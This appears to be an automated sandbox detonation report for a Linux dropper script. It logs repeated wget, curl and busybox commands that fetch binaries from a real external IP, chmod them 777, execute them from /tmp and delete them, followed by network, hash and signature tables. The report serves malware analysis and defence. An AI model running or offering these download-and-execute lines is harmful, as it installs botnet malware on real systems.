[/bin/busybox wget http://87.120.84.230/bins/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]
/bin/chmod
[chmod 777 4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]
/tmp/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK
[./4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]
/bin/rm
[rm 4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]
/usr/bin/wget
[wget http://87.120.84.230/bins/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]
/bin/chmod
[chmod 777 NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]
/tmp/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68
[./NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]
/bin/rm
[rm NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]
/usr/bin/wget
[wget http://87.120.84.230/bins/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]
/bin/chmod
[chmod 777 b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]
/tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem
[./b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]
/bin/rm
[rm b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]
/usr/bin/wget
[wget http://87.120.84.230/bins/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]
/bin/chmod
[chmod 777 V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]
/tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj
[./V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]
/bin/rm
[rm V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]
Network
| Country | Destination | Domain | Proto |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
Files
/tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-29 02:21
Reported
2024-10-29 02:23
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
21s
Max time network
131s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem | /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem | N/A |
| N/A | /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj | /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj | N/A |
| N/A | /tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i | /tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i | N/A |
| N/A | /tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F | /tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F | N/A |
| N/A | /tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E | /tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E | N/A |
| N/A | /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV | /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV | N/A |
| N/A | /tmp/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby | /tmp/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby | N/A |
| N/A | /tmp/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA | /tmp/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA | N/A |
| N/A | /tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D | /tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D | N/A |
| N/A | /tmp/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif | /tmp/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif | N/A |
| N/A | /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb | /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb | N/A |
| N/A | /tmp/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe | /tmp/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe | N/A |
| N/A | /tmp/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK | /tmp/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK | N/A |
| N/A | /tmp/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68 | /tmp/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68 | N/A |
| N/A | /tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i | /tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i | N/A |
| N/A | /tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F | /tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F | N/A |
| N/A | /tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E | /tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E | N/A |
| N/A | /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV | /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV | N/A |
| N/A | /tmp/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby | /tmp/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby | N/A |
| N/A | /tmp/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA | /tmp/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA | N/A |
| N/A | /tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D | /tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D | N/A |
| N/A | /tmp/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif | /tmp/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif | N/A |
| N/A | /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb | /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb | N/A |
| N/A | /tmp/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe | /tmp/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe | N/A |
| N/A | /tmp/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK | /tmp/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK | N/A |
| N/A | /tmp/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68 | /tmp/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68 | N/A |
| N/A | /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem | /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem | N/A |
| N/A | /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj | /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i | /usr/bin/curl | N/A |
| File opened for modification | /tmp/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif | /usr/bin/curl | N/A |
| File opened for modification | /tmp/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i | /usr/bin/curl | N/A |
| File opened for modification | /tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F | /usr/bin/curl | N/A |
| File opened for modification | /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV | /usr/bin/curl | N/A |
| File opened for modification | /tmp/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK | /usr/bin/curl | N/A |
| File opened for modification | /tmp/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe | /usr/bin/curl | N/A |
| File opened for modification | /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV | /usr/bin/curl | N/A |
| File opened for modification | /tmp/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA | /usr/bin/curl | N/A |
| File opened for modification | /tmp/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F | /usr/bin/curl | N/A |
| File opened for modification | /tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E | /usr/bin/curl | N/A |
| File opened for modification | /tmp/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK | /usr/bin/curl | N/A |
| File opened for modification | /tmp/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb | /usr/bin/curl | N/A |
| File opened for modification | /tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb | /usr/bin/curl | N/A |
| File opened for modification | /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj | /usr/bin/curl | N/A |
| File opened for modification | /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem | /usr/bin/curl | N/A |
| File opened for modification | /tmp/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA | /usr/bin/curl | N/A |
| File opened for modification | /tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D | /usr/bin/curl | N/A |
| File opened for modification | /tmp/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif | /usr/bin/curl | N/A |
| File opened for modification | /tmp/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby | /usr/bin/curl | N/A |
| File opened for modification | /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem | /usr/bin/curl | N/A |
| File opened for modification | /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj | /usr/bin/curl | N/A |
Processes
/tmp/562daf29b3ace2e773d86c54607031a940d685fa0486400720e6a55754c04c1f.sh
[/tmp/562daf29b3ace2e773d86c54607031a940d685fa0486400720e6a55754c04c1f.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://87.120.84.230/bins/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]
/bin/chmod
[chmod 777 b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]
/tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem
[./b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]
/bin/rm
[rm b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]
/usr/bin/wget
[wget http://87.120.84.230/bins/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]
/bin/chmod
[chmod 777 V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]
/tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj
[./V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]
/bin/rm
[rm V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]
/usr/bin/wget
[wget http://87.120.84.230/bins/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]
/bin/chmod
[chmod 777 Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]
/tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i
[./Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]
/bin/rm
[rm Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]
/usr/bin/wget
[wget http://87.120.84.230/bins/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]
/bin/chmod
[chmod 777 BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]
/tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F
[./BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]
/bin/rm
[rm BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]
/usr/bin/wget
[wget http://87.120.84.230/bins/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]
/bin/chmod
[chmod 777 HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]
/tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E
[./HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]
/bin/rm
[rm HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]
/usr/bin/wget
[wget http://87.120.84.230/bins/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]
/bin/chmod
[chmod 777 R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]
/tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV
[./R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]
/bin/rm
[rm R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]
/usr/bin/wget
[wget http://87.120.84.230/bins/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]
/bin/chmod
[chmod 777 NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]
/tmp/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby
[./NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]
/bin/rm
[rm NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]
/usr/bin/wget
[wget http://87.120.84.230/bins/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]
/bin/chmod
[chmod 777 LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]
/tmp/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA
[./LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]
/bin/rm
[rm LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]
/usr/bin/wget
[wget http://87.120.84.230/bins/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]
/bin/chmod
[chmod 777 yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]
/tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D
[./yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]
/bin/rm
[rm yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]
/usr/bin/wget
[wget http://87.120.84.230/bins/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]
/bin/chmod
[chmod 777 5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]
/tmp/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif
[./5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]
/bin/rm
[rm 5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]
/usr/bin/wget
[wget http://87.120.84.230/bins/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]
/bin/chmod
[chmod 777 GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]
/tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb
[./GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]
/bin/rm
[rm GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]
/usr/bin/wget
[wget http://87.120.84.230/bins/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]
/bin/chmod
[chmod 777 pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]
/tmp/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe
[./pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]
/bin/rm
[rm pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]
/usr/bin/wget
[wget http://87.120.84.230/bins/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]
/bin/chmod
[chmod 777 4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]
/tmp/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK
[./4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]
/bin/rm
[rm 4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]
/usr/bin/wget
[wget http://87.120.84.230/bins/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]
/bin/chmod
[chmod 777 NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]
/tmp/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68
[./NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]
/bin/rm
[rm NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]
/usr/bin/wget
[wget http://87.120.84.230/bins/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]
/bin/chmod
[chmod 777 Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]
/tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i
[./Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]
/bin/rm
[rm Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]
/usr/bin/wget
[wget http://87.120.84.230/bins/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]
/bin/chmod
[chmod 777 BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]
/tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F
[./BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]
/bin/rm
[rm BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]
/usr/bin/wget
[wget http://87.120.84.230/bins/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]
/bin/chmod
[chmod 777 HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]
